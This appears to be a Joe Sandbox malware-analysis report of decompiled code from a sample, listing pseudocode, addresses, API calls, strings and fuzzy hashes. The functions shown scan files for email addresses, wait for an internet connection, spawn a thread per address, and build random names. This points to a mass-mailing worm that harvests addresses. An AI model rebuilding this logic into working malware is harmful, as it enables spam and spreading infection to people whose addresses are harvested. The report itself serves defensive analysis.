								_v1188 = __eax;
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								_v1072 = 1;
								goto L31;
							case 0x12:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0c0; // 0x40e7f1
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x16);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(4);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__edx =  &_v76;
								asm("cld");
								__ecx = 0xa;
								__eax = 0;
								__edi = __edx;
								__eax = memset(__edi, 0, 0xa << 2);
								__edi = __edi + __ecx;
								__ecx = 0;
								_v1204 = 0x40edf7;
								_v1208 = __edx;
								L0040C328();
								__esp = __esp - 8;
								_v1072 = 1;
								L31:
								while(E00404F0A(_t354, _t360) == 0) {
									 *_t374 = 0x7530;
									Sleep(??);
									_t374 = _t374 - 4;
								}
								_v1152 = _v1072;
								_v1156 =  &_v76;
								_v1160 =  &_v780;
								_v1164 =  &_v508;
								_v1168 =  &_v188;
								_v1172 =  &_v1068;
								 *_t374 =  &_v300;
								E00405EE8();
								_t358 = 0;
								goto L33;
						}
					}
					goto L31;
				}
				L33:
				return _t358;
			}

0x00402294
0x0040229e
0x004022a1
0x004022a4
0x004022a9
0x004022ac
0x004022b4
0x004022ba
0x004022d3
0x004022d8
0x004022dc
0x004022df
0x004022e4
0x004022e7
0x004022ef
0x004022f5
0x004022f8
0x004022fd
0x00402301
0x0040230f
0x00402312
0x00402317
0x00402323
0x00402325
0x00402331
0x00402337
0x0040233f
0x00402346
0x0040234b
0x0040234e
0x0040235a
0x0040235a
0x00402368
0x00402370
0x00402378
0x0040237b
0x00402386
0x0040238e
0x00402396
0x00402399
0x004023a4
0x004023ac
0x004023b4
0x004023b7
0x004023bc
0x004023bf
0x004023cc
0x004023cc
0x004023d6
0x004023da
0x004023dc
0x004023df
0x004023e7
0x004023ef
0x004023f2
0x00402403
0x00402407
0x0040240a
0x00402412
0x0040241a
0x0040241d
0x00402422
0x00402425
0x00402431
0x00402439
0x00402441
0x0040244b
0x0040244d
0x0040245b
0x0040245b
0x00402461
0x00402467
0x00000000
0x00402475
0x0040247f
0x00402482
0x00402487
0x0040248a
0x0040249d
0x004024a7
0x004024aa
0x004024af
0x004024b2
0x004024c5
0x004024cf
0x004024d2
0x004024d7
0x00000000
0x00000000
0x004024df
0x004024e4
0x004024e8
0x004024ee
0x004024f1
0x004024f6
0x004024f9
0x00402500
0x00402504
0x0040250a
0x0040250d
0x00402512
0x0040251c
0x00402528
0x0040252c
0x00402532
0x00402535
0x0040253a
0x00000000
0x00000000
0x00402542
0x00402549
0x0040254d
0x00402553
0x00402556
0x0040255b
0x00402565
0x00402571
0x00402575
0x0040257b
0x0040257e
0x00402583
0x00402586
0x0040258b
0x0040258f
0x00402595
0x00402598
0x0040259d
0x00000000
0x00000000
0x004025a5
0x004025ac
0x004025b0
0x004025b6
0x004025b9
0x004025be
0x004025c8
0x004025d4
0x004025d8
0x004025de
0x004025e1
0x004025e6
0x004025e9
0x004025ee
0x004025f2
0x004025f8
0x004025fb
0x00402600
0x00000000
0x00000000
0x00402608
0x0040260f
0x00402613
0x00402619
0x0040261c
0x00402621
0x0040262b
0x00402637
0x0040263b
0x00402641
0x00402644
0x00402649
0x0040264c
0x00402651
0x00402655
0x0040265b
0x0040265e
0x00402663
0x00000000
0x00000000
0x0040266b
0x00402672
0x00402676
0x0040267c
0x0040267f
0x00402684
0x0040268e
0x0040269a
0x0040269e
0x004026a4
0x004026a7
0x004026ac
0x004026af
0x004026b4
0x004026b8
0x004026be
0x004026c1
0x004026c6
0x00000000
0x00000000
0x004026ce
0x004026d5
0x004026d9
0x004026df
0x004026e2
0x004026e7
0x004026ea
0x004026ef
0x004026f3
0x004026f9
0x004026fc
0x00402701
0x0040270b
0x00402717
0x0040271b
0x00402721
0x00402724
0x00402729
0x00402733
0x0040273f
0x00402743
0x00402746
0x0040274b
0x00000000
0x00000000
0x00402753
0x0040275a
0x0040275e
0x00402764
0x00402767
0x0040276c
0x0040276f
0x00402774
0x00402778
0x0040277e
0x00402781
0x00402786
0x00402790
0x0040279c
0x004027a0
0x004027a6
0x004027a9
0x004027ae
0x004027b8
0x004027c4
0x004027c8
0x004027cb
0x004027d0
0x00000000
0x00000000
0x004027d8
0x004027df
0x004027e3
0x004027e9
0x004027ec
0x004027f1
0x004027f4
0x004027f9
0x004027fd
0x00402803
0x00402806
0x0040280b
0x00402815
0x00402821
0x00402825
0x0040282b
0x0040282e
0x00402833
0x0040283d
0x00402849
0x0040284d
0x00402850
0x00402855
0x00000000
0x00000000
0x0040285d
0x00402864
0x00402868
0x0040286e
0x00402871
0x00402876
0x00402879
0x0040287e
0x00402882
0x00402888
0x0040288b
0x00402890
0x0040289a
0x004028a6
0x004028aa
0x004028b0
0x004028b3
0x004028b8
0x004028c2
0x004028ce
0x004028d2
0x004028d5
0x004028da
0x00000000
0x00000000
0x004028e2
0x004028e9
0x004028ed
0x004028f3
0x004028f6
0x004028fb
0x004028fe
0x00402903
0x00402907
0x0040290d
0x00402910
0x00402915
0x00402918
0x00402920
0x00402926
0x00402929
0x0040292e
0x00000000
0x00000000
0x00402936
0x0040293d
0x00402941
0x00402947
0x0040294a
0x0040294f
0x00402959
0x00402965
0x00402969
0x0040296f
0x00402972
0x00402977
0x00402981
0x0040298d
0x00402991
0x00402997
0x0040299a
0x0040299f
0x004029a9
0x004029b5
0x004029b9
0x004029bc
0x004029c1
0x00000000
0x00000000
0x004029c9
0x004029d0
0x004029d4
0x004029da
0x004029dd
0x004029e2
0x004029ec
0x004029f8
0x004029fc
0x00402a02
0x00402a05
0x00402a0a
0x00402a14
0x00402a20
0x00402a24
0x00402a27
0x00402a2c
0x00402a2f
0x00402a34
0x00402a38
0x00402a3e
0x00402a41
0x00402a46
0x00402a49
0x00402a4c
0x00402a4d
0x00402a52
0x00402a57
0x00402a59
0x00402a59
0x00402a59
0x00402a5b
0x00402a63
0x00402a66
0x00402a6b
0x00000000
0x00000000
0x00402a73
0x00402a7a
0x00402a7e
0x00402a84
0x00402a87
0x00402a8c
0x00402a96
0x00402aa2
0x00402aa6
0x00402aac
0x00402aaf
0x00402ab4
0x00402abe
0x00402aca
0x00402ace
0x00402ad1
0x00402ad6
0x00402ad9
0x00402ade
0x00402ae2
0x00402ae8
0x00402aeb
0x00402af0
0x00402af3
0x00402af6
0x00402af7
0x00402afc
0x00402b01
0x00402b03
0x00402b03
0x00402b03
0x00402b05
0x00402b0d
0x00402b10
0x00402b15
0x00000000
0x00000000
0x00402b1d
0x00402b24
0x00402b28
0x00402b2e
0x00402b31
0x00402b36
0x00402b40
0x00402b4c
0x00402b50
0x00402b56
0x00402b59
0x00402b5e
0x00402b68
0x00402b74
0x00402b78
0x00402b7e
0x00402b81
0x00402b86
0x00402b90
0x00402b9c
0x00402ba0
0x00402ba3
0x00402ba8
0x00402bab
0x00000000
0x00000000
0x00402bba
0x00402bc1
0x00402bc5
0x00402bcb
0x00402bce
0x00402bd3
0x00402bd6
0x00402bdb
0x00402bdf
0x00402be5
0x00402be8
0x00402bed
0x00402bfe
0x00402c78
0x00402c84
0x00402c88
0x00402c8e
0x00402c91
0x00402c96
0x00402ca0
0x00402cac
0x00402cb0
0x00402cb3
0x00402cb8
0x00402cbb
0x00402cbe
0x00402cbf
0x00402cc4
0x00402cc9
0x00402ccb
0x00402ccb
0x00402ccb
0x00402ccd
0x00402cd5
0x00402cd8
0x00402cdd
0x00402c00
0x00402c07
0x00402c13
0x00402c17
0x00402c1d
0x00402c20
0x00402c25
0x00402c2f
0x00402c3b
0x00402c3f
0x00402c42
0x00402c47
0x00402c4a
0x00402c4d
0x00402c4e
0x00402c53
0x00402c58
0x00402c5a
0x00402c5a
0x00402c5a
0x00402c5c
0x00402c64
0x00402c67
0x00402c6c
0x00402c6c
0x00402ce0
0x00402ce8
0x00402cee
0x00402cf1
0x00402cf6
0x00402cfa
0x00402d02
0x00402d08
0x00402d0b
0x00402d10
0x00000000
0x00000000
0x00402d1f
0x00402d26
0x00402d2a
0x00402d30
0x00402d33
0x00402d38
0x00402d3b
0x00402d40
0x00402d44
0x00402d4a
0x00402d4d
0x00402d52
0x00402d5c
0x00402d68
0x00402d6c
0x00402d72
0x00402d75
0x00402d7a
0x00402d84
0x00402d90
0x00402d94
0x00402d97
0x00402d9c
0x00402d9f
0x00000000
0x00000000
0x00402dae
0x00402db5
0x00402db9
0x00402dbf
0x00402dc2
0x00402dc7
0x00402dca
0x00402dcf
0x00402dd3
0x00402dd9
0x00402ddc
0x00402de1
0x00402de4
0x00402de9
0x00402ded
0x00402df3
0x00402df6
0x00402dfb
0x00402dfe
0x00000000
0x00000000
0x00402e0d
0x00402e14
0x00402e18
0x00402e1e
0x00402e21
0x00402e26
0x00402e29
0x00402e2e
0x00402e32
0x00402e38
0x00402e3b
0x00402e40
0x00402e4a
0x00402e56
0x00402e5a
0x00402e60
0x00402e63
0x00402e68
0x00402e72
0x00402e7e
0x00402e82
0x00402e85
0x00402e8a
0x00402e8d
0x00402e90
0x00402e91
0x00402e96
0x00402e9b
0x00402e9d
0x00402e9d
0x00402e9d
0x00402e9f
0x00402ea7
0x00402eaa
0x00402eaf
0x00402eb2
0x00000000
0x00402ecd
0x00402ebe
0x00402ec5
0x00402eca
0x00402eca
0x00402edc
0x00402ee3
0x00402eed
0x00402ef7
0x00402f01
0x00402f0b
0x00402f15
0x00402f18
0x00402f1d
0x00000000
0x00000000
0x00402467
0x00000000
0x00402461
0x00402f22
0x00402f2b

APIs

lstrlen.KERNEL32 ref: 004022A4
memset.MSVCRT ref: 004022D3
lstrcpy.KERNEL32 ref: 004022DF

Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

Sleep.KERNEL32 ref: 00402346
memset.MSVCRT ref: 0040237B
memset.MSVCRT ref: 00402399
memset.MSVCRT ref: 004023B7
lstrcat.KERNEL32 ref: 004023DF
lstrcat.KERNEL32 ref: 004023F2
lstrcat.KERNEL32 ref: 0040240A
lstrcat.KERNEL32 ref: 0040241D
strstr.MSVCRT ref: 00402444
lstrcat.KERNEL32 ref: 00402482
lstrcat.KERNEL32 ref: 004024AA
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 004024D2

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Strings

_@, xrefs: 004025E9
mvcsv.qyy, xrefs: 004022E7
.zip, xrefs: 00402412
s@, xrefs: 0040264C
N@, xrefs: 00402586
@, xrefs: 004026EA
d, xrefs: 004023A4
.ru, xrefs: 00402439
8@, xrefs: 004024DF
X@, xrefs: 004027F4

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$memset$Sleeplstrlen$ConnectedCountDirectoryHandleInternetLibraryLoadModuleStateSystemTicklstrcpyrandsrandstrstr
String ID: .ru$.zip$8@$N@$X@$_@$d$mvcsv.qyy$s@$@
API String ID: 4149311011-1716888737
Opcode ID: 7e3f864fb77927ba2efb06760720045ebe60907d4ebc95661c7502bd9f0cadcb
Instruction ID: c4b552956d8c88359d0401bfea8a3880dfb39e4fafa2b11eb934faa6a3ed69b2
Opcode Fuzzy Hash: 7e3f864fb77927ba2efb06760720045ebe60907d4ebc95661c7502bd9f0cadcb
Instruction Fuzzy Hash: 27F1DBB5814304CBCB10BF75D98569DBBF0BB84304F41897EE9C8A7291EB389698CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00404F82 Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 210timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00404FD9
GetTickCount.KERNEL32 ref: 00404FE1
srand.MSVCRT ref: 00404FE9
rand.MSVCRT ref: 00404FF2
GetTickCount.KERNEL32 ref: 00404FF9
srand.MSVCRT ref: 00405001
rand.MSVCRT ref: 0040500D
GetTickCount.KERNEL32 ref: 00405026
srand.MSVCRT ref: 0040502E
rand.MSVCRT ref: 00405033
GetTickCount.KERNEL32 ref: 0040504E
srand.MSVCRT ref: 00405056
rand.MSVCRT ref: 0040505B
GetTickCount.KERNEL32 ref: 00405076
srand.MSVCRT ref: 0040507E
rand.MSVCRT ref: 00405083
GetTickCount.KERNEL32 ref: 0040509E
srand.MSVCRT ref: 004050A6
rand.MSVCRT ref: 004050AB
GetTickCount.KERNEL32 ref: 004050C6
srand.MSVCRT ref: 004050CE
rand.MSVCRT ref: 004050D3
GetLocalTime.KERNEL32 ref: 004050E5
_itoa.MSVCRT ref: 00405102
rand.MSVCRT ref: 00405107
rand.MSVCRT ref: 0040513A
rand.MSVCRT ref: 00405168
rand.MSVCRT ref: 00405196
rand.MSVCRT ref: 004051C0
rand.MSVCRT ref: 004051EF

Strings

abcdefghijklmnopqrstuvwxyz, xrefs: 00404F8E
1, xrefs: 00405006

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: rand$CountTicksrand$LocalTime$_itoa
String ID: 1$abcdefghijklmnopqrstuvwxyz
API String ID: 1825045967-2454072292
Opcode ID: 4f87a31ff910bbbb76765ae44f831347ed66564e87c85ef04c6c44d63fd729d0
Instruction ID: 02076846e8c8a6e31432f83e4ba7e8d02048c9f1cba05857c09831ad89ea6e40
Opcode Fuzzy Hash: 4f87a31ff910bbbb76765ae44f831347ed66564e87c85ef04c6c44d63fd729d0
Instruction Fuzzy Hash: 05818271D10255CECB20EFFDC9855AEBBF0EF44304F04827EE884EB686E63859458B99

Uniqueness

Uniqueness Score: -1.00%

Function 100024A2 Relevance: 54.4, APIs: 29, Strings: 2, Instructions: 183timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 100024F9
GetTickCount.KERNEL32 ref: 10002501
srand.MSVCRT ref: 10002509
rand.MSVCRT ref: 10002512
GetTickCount.KERNEL32 ref: 10002519
srand.MSVCRT ref: 10002521
rand.MSVCRT ref: 1000252D
GetTickCount.KERNEL32 ref: 10002546
srand.MSVCRT ref: 1000254E
rand.MSVCRT ref: 10002553
GetTickCount.KERNEL32 ref: 1000256E
srand.MSVCRT ref: 10002576
rand.MSVCRT ref: 1000257B
GetTickCount.KERNEL32 ref: 10002596
srand.MSVCRT ref: 1000259E
rand.MSVCRT ref: 100025A3
GetTickCount.KERNEL32 ref: 100025BE
srand.MSVCRT ref: 100025C6
rand.MSVCRT ref: 100025CB
GetTickCount.KERNEL32 ref: 100025E6
srand.MSVCRT ref: 100025EE
rand.MSVCRT ref: 100025F3
GetLocalTime.KERNEL32 ref: 10002605
_itoa.MSVCRT ref: 10002622
rand.MSVCRT ref: 10002627
rand.MSVCRT ref: 1000265A
rand.MSVCRT ref: 10002688
rand.MSVCRT ref: 100026B6
rand.MSVCRT ref: 100026E4

Strings

abcdefghijklmnopqrstuvwxyz, xrefs: 100024AE
1, xrefs: 10002526

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: rand$CountTicksrand$LocalTime$_itoa
String ID: 1$abcdefghijklmnopqrstuvwxyz
API String ID: 1825045967-2454072292
Opcode ID: d440a931a9828604412f1a6c5e1eba2545ae415163184f67e12b98fea018b4f9
Instruction ID: 08b90c865ba8496aedd198f6e57dbd32cf2abbb3e8829b71b4f22ed4fc9ecb7d
Opcode Fuzzy Hash: d440a931a9828604412f1a6c5e1eba2545ae415163184f67e12b98fea018b4f9
Instruction Fuzzy Hash: 3E71B475D016158EDB12DFBCC8451AEFBF8EF04381F44862AE884EB24AEB34B5558B91

Uniqueness

Uniqueness Score: -1.00%

Function 0040307E Relevance: 49.2, APIs: 19, Strings: 9, Instructions: 199
sleepfilestringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040307E(signed int __edx, char* _a4) {
				void* _v16;
				char _v236;
				char _v237;
				char _v240;
				int _v244;
				int _v248;
				char* _v268;
				int _v272;
				char* _v276;
				intOrPtr _v280;
				int _v284;
				void* __ebx;
				int _t64;
				int _t69;
				long _t71;
				int _t77;
				signed int _t80;
				signed int _t81;
				int _t83;
				int _t92;
				int _t95;
				signed int _t97;
				int _t99;
				int _t100;
				int _t101;
				int _t102;
				int _t103;
				signed int _t104;
				signed int _t107;
				long _t110;
				struct _IO_FILE* _t111;
				struct _IO_FILE* _t112;
				int* _t113;
				intOrPtr* _t114;

				_t104 = __edx;
				_v244 = 0;
				_t110 = 0;
				_t111 = fopen(_a4, 0x40efaf);
				_t64 = 0;
				if(_t111 == 0) {
					L50:
					return _t64;
				}
				while(fgetc(_t111) != 0xffffffff) {
					_v244 = _v244 + 1;
				}
				fclose(_t111);
				_t112 = fopen(_a4, 0x40efaf);
				_t64 = 0;
				if(_t112 == 0) {
					goto L50;
				}
				while(1) {
					L47:
					_t69 = fgetc(_t112);
					_t99 = _t69;
					if(_t69 == 0xffffffff || _t110 > _v244) {
						break;
					}
					if(_t99 != 0x40) {
						continue;
					}
					_t71 = ftell(_t112);
					_t8 = _t71 - 1; // -1
					_t110 = _t8;
					if(_t110 > 0) {
						_t9 = _t71 - 2; // -2
						_t110 = _t9;
					}
					fseek(_t112, _t110, 0);
					_t100 = fgetc(_t112);
					while(1) {
						_t14 = _t100 - 0x61; // -97
						_t17 = _t100 - 0x41; // -65
						_t104 = _t104 & 0xffffff00 | _t14 - 0x00000019 < 0x00000000 | _t17 & 0xffffff00 | _t17 - 0x00000019 < 0x00000000;
						if(_t104 != 0) {
							goto L11;
						}
						L15:
						_t20 = _t100 - 0x30; // -48
						_t97 = _t20;
						if(_t97 <= 9) {
							goto L11;
						}
						_t104 = _t104 & 0xffffff00 | _t100 == 0x0000005f | _t97 & 0xffffff00 | _t100 == 0x0000002d;
						if(_t104 == 0 && _t100 != 0x2e) {
							L18:
							_v248 = 0;
							while(1) {
								_t77 = fgetc(_t112);
								_t101 = _t77;
								if(_t77 == 0xffffffff) {
									break;
								}
								_t103 = 0;
								_t26 = _t101 - 0x61; // -97
								if(_t26 <= 0x19) {
									_t103 = 1;
								}
								_t27 = _t101 - 0x41; // -65
								if(_t27 <= 0x19) {
									_t103 = 1;
								}
								_t28 = _t101 - 0x30; // -48
								_t80 = _t28;
								if(_t80 <= 9) {
									_t103 = 1;
								}
								_t81 = _t80 & 0xffffff00 | _t101 == 0x0000002d;
								_t107 = _t104 & 0xffffff00 | _t101 == 0x0000005f | _t81;
								if(_t107 != 0) {
									_t103 = 1;
								}
								_t104 = _t107 & 0xffffff00 | _t101 == 0x00000040 | _t81 & 0xffffff00 | _t101 == 0x0000002e;
								if(_t104 != 0) {
									_t103 = 1;
								}
								if(_t103 == 0) {
									break;
								} else {
									_t92 = _v248;
									 *(_t92 +  &_v236) = _t101;
									_v248 = _t92 + 1;
									continue;
								}
							}
							_t83 = _v248;
							 *((char*)(_t83 +  &_v236)) = 0;
							if( *((char*)(_t83 +  &_v237)) == 0x40) {
								goto L47;
							}
							_t102 =  &_v236;
							_v284 = _t102;
							L0040C310();
							_t113 = _t113 - 4;
							if(_t83 > 9 &&  *((char*)(_v248 +  &_v237)) != 0x2e && _v236 != 0x40 && _v236 != 0x2e && _v236 != 0x2d) {
								 *_t113 = _t102;
								if(E00403008() == 0) {
									goto L47;
								}
								 *_t113 = _t102;
								if(E00402FC2(_t85, _t102) == 0) {
									goto L47;
								}
								 *_t113 = _t102;
								if(E0040305A() == 0) {
									goto L47;
								}
								while(E00404F0A(_t102, _t104) == 0) {
									 *_t113 = 0x7530;
									Sleep(??);
									_t113 = _t113 - 4;
								}
								_v268 =  &_v240;
								_v272 = 0;
								_v276 =  &_v236;
								_v280 = E00402288;
								_v284 = 0;
								 *_t113 = 0;
								CreateThread(??, ??, ??, ??, ??, ??);
								_t114 = _t113 - 0x18;
								 *_t114 = 0x28;
								Sleep(??);
								_t113 = _t114 - 4;
								if( *0x414018 == 4) {
									 *0x414018 = 0;
									 *_t113 = 0xfa0;
									Sleep(??);
									_t113 = _t113 - 4;
								}
								 *0x414018 =  *0x414018 + 1;
							}
							goto L47;
						}
						L11:
						if(_t110 == 0) {
							rewind(_t112);
							goto L18;
						}
						_t110 = _t110 - 1;
						fseek(_t112, _t110, 0);
						_t95 = fgetc(_t112);
						_t100 = _t95;
						if(_t95 == 0xffffffff) {
							fclose(_t112);
						}
						_t14 = _t100 - 0x61; // -97
						_t17 = _t100 - 0x41; // -65
						_t104 = _t104 & 0xffffff00 | _t14 - 0x00000019 < 0x00000000 | _t17 & 0xffffff00 | _t17 - 0x00000019 < 0x00000000;
						if(_t104 != 0) {
							goto L11;
						}
						goto L15;
					}
				}
				fclose(_t112);
				_t64 = 0;
				goto L50;
			}

0x0040307e
0x0040308a
0x00403094
0x004030ac
0x004030ae
0x004030b5
0x00403388
0x0040338f
0x0040338f
0x004030c3
0x004030bd
0x004030bd
0x004030d3
0x004030eb
0x004030ed
0x004030f4
0x00000000
0x00000000
0x00403360
0x00403360
0x00403363
0x00403368
0x0040336d
0x00000000
0x00000000
0x0040310f
0x00000000
0x00000000
0x00403118
0x0040311d
0x0040311d
0x00403122
0x00403124
0x00403124
0x00403124
0x00403136
0x00403143
0x00403177
0x00403177
0x00403180
0x00403189
0x0040318b
0x00000000
0x00000000
0x0040318d
0x0040318d
0x0040318d
0x00403193
0x00000000
0x00000000
0x004031a1
0x004031a3
0x004031aa
0x004031aa
0x00403224
0x00403227
0x0040322c
0x00403231
0x00000000
0x00000000
0x004031b6
0x004031bb
0x004031c1
0x004031c3
0x004031c3
0x004031c8
0x004031ce
0x004031d0
0x004031d0
0x004031d5
0x004031d5
0x004031db
0x004031dd
0x004031dd
0x004031eb
0x004031ee
0x004031f0
0x004031f2
0x004031f2
0x00403203
0x00403205
0x00403207
0x00403207
0x0040320e
0x00000000
0x00403210
0x00403210
0x00403216
0x0040321e
0x00000000
0x0040321e
0x0040320e
0x00403233
0x00403239
0x00403249
0x00000000
0x00000000
0x0040324f
0x00403255
0x00403258
0x0040325d
0x00403263
0x004032a4
0x004032ae
0x00000000
0x00000000
0x004032b4
0x004032be
0x00000000
0x00000000
0x004032c4
0x004032ce
0x00000000
0x00000000
0x004032e5
0x004032d6
0x004032dd
0x004032e2
0x004032e2
0x004032f4
0x004032f8
0x00403306
0x0040330a
0x00403312
0x0040331a
0x00403321
0x00403326
0x00403329
0x00403330
0x00403335
0x0040333f
0x00403341
0x0040334b
0x00403352
0x00403357
0x00403357
0x0040335a
0x0040335a
0x00000000
0x00403263
0x00403147
0x00403149
0x00403102
0x00000000
0x00403102
0x0040314b
0x0040315b
0x00403163
0x00403168
0x0040316d
0x00403172
0x00403172
0x00403177
0x00403180
0x00403189
0x0040318b
0x00000000
0x00000000
0x00000000
0x0040318b
0x00403177
0x0040337e
0x00403383
0x00000000

APIs

fopen.MSVCRT ref: 004030A7
fgetc.MSVCRT ref: 004030C6
fclose.MSVCRT ref: 004030D3
fopen.MSVCRT ref: 004030E6
rewind.MSVCRT ref: 00403102
fgetc.MSVCRT ref: 00403227
lstrlen.KERNEL32 ref: 00403258
Sleep.KERNEL32 ref: 004032DD
CreateThread.KERNEL32 ref: 00403321
Sleep.KERNEL32 ref: 00403330
Sleep.KERNEL32 ref: 00403352
fgetc.MSVCRT ref: 00403363
fclose.MSVCRT ref: 0040337E

Strings

_, xrefs: 004031E2
@, xrefs: 004031F7
@, xrefs: 0040310C
-, xrefs: 00403297
-, xrefs: 0040319B
., xrefs: 004031FD
., xrefs: 004031A5
-, xrefs: 004031E8
_, xrefs: 00403195

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Sleepfgetc$fclosefopen$CreateThreadlstrlenrewind
String ID: -$-$-$.$.$@$@$_$_
API String ID: 3748466826-511738659
Opcode ID: e3e62f6e979f6702fd6e717d28f425ea4601e77e36b28012b9f2447554cc7b5d
Instruction ID: 6d437ecd7483d23b259e28590f61e0e5bcbda088feaf823980ac16ccee795e59
Opcode Fuzzy Hash: e3e62f6e979f6702fd6e717d28f425ea4601e77e36b28012b9f2447554cc7b5d
Instruction Fuzzy Hash: 287182748043148AD720AF25C4C536EBFA8AF44715F1549BFE885AB3C1DB7C8B848B8B

Uniqueness

Uniqueness Score: -1.00%

Function 0040829C Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 231
filestringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040829C(signed int __edx, CHAR* _a4, CHAR* _a8, void* _a12) {
				void* _v16;
				short _v32;
				short _v34;
				long _v38;
				long _v42;
				intOrPtr _v46;
				void* _v48;
				signed short _v50;
				short _v52;
				short _v54;
				short _v56;
				void _v60;
				short _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				short _v82;
				short _v84;
				short _v86;
				short _v88;
				char _v92;
				struct _OVERLAPPED* _v98;
				intOrPtr _v102;
				short _v104;
				short _v110;
				short _v112;
				long _v116;
				long _v120;
				intOrPtr _v124;
				short _v126;
				short _v128;
				short _v130;
				short _v132;
				short _v134;
				short _v136;
				void _v140;
				char _v1164;
				long _v1168;
				long _v1172;
				void* _v1176;
				void* _v1188;
				void* _v1192;
				void* _v1196;
				void* _v1200;
				void* _v1204;
				void* _v1208;
				char _v1212;
				struct _OVERLAPPED* _v1216;
				void* _v1220;
				long _v1224;
				void* _v1228;
				signed int _t133;
				signed int _t137;
				int _t140;
				int _t141;
				intOrPtr _t148;
				long _t149;
				long _t150;
				short _t151;
				long _t155;
				char _t159;
				int _t162;
				long _t167;
				void* _t171;
				intOrPtr _t187;
				struct _OVERLAPPED* _t190;
				signed int _t197;
				signed int _t199;
				void* _t204;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t225;
				void* _t226;
				intOrPtr* _t230;
				void** _t231;

				_t197 = __edx;
				_t133 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
				_t213 = _t212 - 0x1c;
				_t211 = _t133;
				_t190 = 0;
